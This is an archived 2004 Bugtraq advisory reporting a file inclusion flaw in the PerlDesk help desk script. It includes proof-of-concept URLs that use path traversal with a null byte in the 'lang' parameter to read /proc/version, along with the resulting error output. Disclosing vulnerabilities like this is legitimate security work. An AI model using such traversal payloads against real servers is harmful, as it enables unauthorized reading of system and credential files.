| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040912182836.10080.qmail@www.securityfocus.com>
Date: 12 Sep 2004 18:28:36 -0000
From: Nikyt0x Argentina <nikyt0x@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Posible Inclusion File in Perl Desk
Posible Inclusion File in Perl Desk
0000-0002 Adv-Nkxtox
[Date] 12/09/04
[Author] Nikyt0x nikyt0x[at]hotmail[dot]com
[Site] Http://nikyt0x.webcindario.com
[Information]
PerlDesk is a feature packed web based help desk and email management application designed
to streamline the operation of managing emails or support requests, with built in tracking
and response logging it is an ideal help desk solution for companies with one or more members
of staff or for those who want to organise client support.
[Bug]
Bug is in Inclusion in lang.
Http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z
Can't locate include/lang/h4x0rs Rul3z.inc in @INC (@INC contains: include/mods /etc/perl /usr/lib/perl5/site_perl/5.8.0/i686-linux /usr/lib/perl5/site_perl/5.8.0 /usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.0/i686-linux /usr/lib/perl5/vendor_perl/5.8.0 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.0/i686-linux /usr/lib/perl5/5.8.0 /usr/local/lib/site_perl .) at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
But if you use: pdesk.cgi?lang=[file]%00 :
Http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00
syntax error at include/lang/../../../../../../../proc/version line 1, near "2.4.21 (" Compilation failed in require at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
If you read error, you can see Version of Kernel "2.4.21".
...I love this game...
Powered by blists - more mailing lists